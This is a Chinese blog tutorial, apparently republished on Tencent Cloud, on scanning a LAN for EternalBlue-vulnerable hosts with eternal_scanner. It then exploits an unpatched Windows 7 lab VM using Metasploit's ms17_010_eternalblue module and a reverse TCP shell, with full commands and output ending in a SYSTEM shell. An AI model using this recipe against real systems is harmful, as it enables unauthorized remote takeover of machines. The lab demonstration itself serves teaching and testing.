扫描检测你的局域网中是不是还有EternalBlue漏洞(ETERNAL SCANNER)

概述

好久没有写过关于工具的博客了,今天介绍的是EternalBlue漏洞扫描工具,支持扫描单个主机和一整个ip段 废话不多说,安装使用体验一下

使用

首先打开kali虚拟机,当然最好准备一台新安装的windows7虚拟机,window7要打开网络发现和文件共享,也就是要把445端口打开 之后下载工具 git clone https://github.com/peterpt/eternal_scanner.git 安装一些需要的工具 apt install masscan metasploit-framework wget 修改扫描速率为最大值扫描真个局域网并且运行

root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
 *****************************************
 * ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄   ▐ ▄  ▄▄▄· ▄▄▌    *
 * ▀▄.▀·•██  ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██•    *
 * ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪    *
 * ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌  *
 *  ▀▀▀  ▀▀▀  ▀▀▀ .▀  ▀▀▀ █▪ ▀  ▀ .▀▀▀   *
 * .▄▄ ·  ▄▄·  ▄▄▄·  ▐ ▄  ▐ ▄ ▄▄▄ .▄▄▄   *
 * ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
 * ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄  *
 * ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
 *  ▀▀▀▀ ·▀▀▀  ▀  ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀  ▀ *
 *****************************************
 *        Current Version : 2.1          *
 *****************************************

 For switches write (escan -h)
 Config Port: 445 | Rate Speed: 10000000 pkt/s

 Enter IP or IP range .
 Example 1 : 192.168.1.32
 Example 2 : 192.168.1.1/24

 IP/IP Range : 192.168.1.1/24

 User IP Input : 192.168.1.1/24


 Press CTRL-C (1X ONLY) to stop the scanner 

Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08 
 It was not detected in 192.168.1.1/24 any port 445 opened.

一次完整的使用EternalBlue入侵windows7

之后我打开安装好的windows虚拟机,我们就入侵一下,事先说明这台机器全新安装,没有打过任何补丁,并且开启了网络发现和文件共享 首先我只知道这台机器在我的局域网中,但是不知道是什么ip地址 使用工具扫描

root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000 
 *****************************************
 * ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄   ▐ ▄  ▄▄▄· ▄▄▌    *
 * ▀▄.▀·•██  ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██•    *
 * ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪    *
 * ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌  *
 *  ▀▀▀  ▀▀▀  ▀▀▀ .▀  ▀▀▀ █▪ ▀  ▀ .▀▀▀   *
 * .▄▄ ·  ▄▄·  ▄▄▄·  ▐ ▄  ▐ ▄ ▄▄▄ .▄▄▄   *
 * ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
 * ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄  *
 * ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
 *  ▀▀▀▀ ·▀▀▀  ▀  ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀  ▀ *
 *****************************************
 *        Current Version : 2.1          *
 *****************************************

 For switches write (escan -h)
 Config Port: 445 | Rate Speed: 10000000 pkt/s

 Enter IP or IP range .
 Example 1 : 192.168.1.32
 Example 2 : 192.168.1.1/24

 IP/IP Range : 192.168.1.1/24

 User IP Input : 192.168.1.1/24


 Press CTRL-C (1X ONLY) to stop the scanner 

Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35 

        Checking ips :
 ----------------------------
 
192.168.1.107

 ----------------------------
Collected 1 ips
 Checking if the 1 ips above are vulnerable

 Press CTRL-C (1X ONLY) to stop ips vulnerability check
 (aborting this process will not verify all ips)

Please Wait , checking 1 ips may take a while
 +---------------------------------------------------+
 | Realtime Eternal Scan Metasploit results Checkout |
 +---------------------------------------------------+
 |      Please wait for percentage output            |
 +---------------------------------------------------+
[*] Scanned 1 of 1 hosts (100% complete)

 1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
 Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt

可以看出扫到了一个ip 192.168.1.107 并且把结果保存在了/usr/local/share/Eternal_Scanner/vuln.txt这个地方 之后,我们开始入侵 首先打开metasploit 搜索一下有没有漏洞利用模块,如果没有你要更新一下你的metasploit

root@kali:~/kali_tools/eternal_scanner# msfconsole 
                                                  
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.16.7-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 299 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search CVE-2017-0144
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > 

没错,有两个模块可以使用,第一个是扫描模块,第二个是漏洞利用模块,所以很简单,看下面我操作

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.104    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.104:4444 
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.1.107:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.104:4444 -> 192.168.1.107:49161) at 2017-10-18 04:35:41 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>    

成功

欢迎关注Bboysoul的博客www.bboysoul.com Have Fun

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏乐沙弥的世界

ORA-27102: out of memory 故障

      最近的UAT数据库迁移,由于是多个DB需要迁移到同一台机器,一部分完成后,启动后续数据库碰到了ORA-27102错误,提示内存超出,查看系统可用内存...

9920
来自专栏SpringSpace.cn

RHEL 4.7 (64bit) 环境安装 GCC 4.6 测试记录 (更新至gcc-4.6.1)

Red Hat Enterprise Linux AS release 4 (Nahant Update 7)

24620
来自专栏Kubernetes

Kubernetes Nginx Ingress Controller源码分析之创建篇

main controllers/nginx/pkg/cmd/controller/main.go:29 func main() { // start a ...

97370
来自专栏菩提树下的杨过

spring cloud 学习(1) - 基本的SOA示例

有过dubbo/dubbox使用经验的朋友,看到下面这张图,一定很熟悉,就是SOA架构的最基本套路。 ? 与dubbo对比,上图的3大要素中,spring cl...

34580
来自专栏java闲聊

Netty入门(一)

在文章开始之前首先明确一个问题,为什么要使用Netty,Netty解决了什么问题,围绕着这个问题我们开始本篇文章的学习

18120
来自专栏haifeiWu与他朋友们的专栏

Netty实战之第一个应用

作为一个正在Java路上摸爬滚打的小菜鸡,之前在项目中也用过Netty,也因为Netty报名阿里的中间件大赛,但终究功力太浅,最终不了了之,最近工作中又遇到了N...

22220
来自专栏安恒网络空间安全讲武堂

HackTheBox - Poison Writeup

来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

19120
来自专栏Java架构师历程

使用Spring Boot,JPA,Hibernate和Postgres的多租户应用程序

多租户是一种方法,应用程序实例由不同的客户使用,从而降低软件开发和部署成本,与单一租户解决方案相比,在这种解决方案中,需要触及多个部分以提供新客户端或更新现有租...

2.9K30
来自专栏JAVA烂猪皮

Netty原理分析

Netty是一个高性能、异步事件驱动的NIO框架,基于JAVA NIO提供的API实现。它提供了对TCP、UDP和文件传输的支持,作为一个异步NIO框架,Net...

27020
来自专栏Android中高级开发

Android开发之漫漫长途 Ⅷ——Android Binder(也许是最容易理解的)

该文章是一个系列文章,是本人在Android开发的漫漫长途上的一点感想和记录,我会尽量按照先易后难的顺序进行编写该系列。该系列引用了《Android开发艺术探索...

15310

扫码关注云+社区

领取腾讯云代金券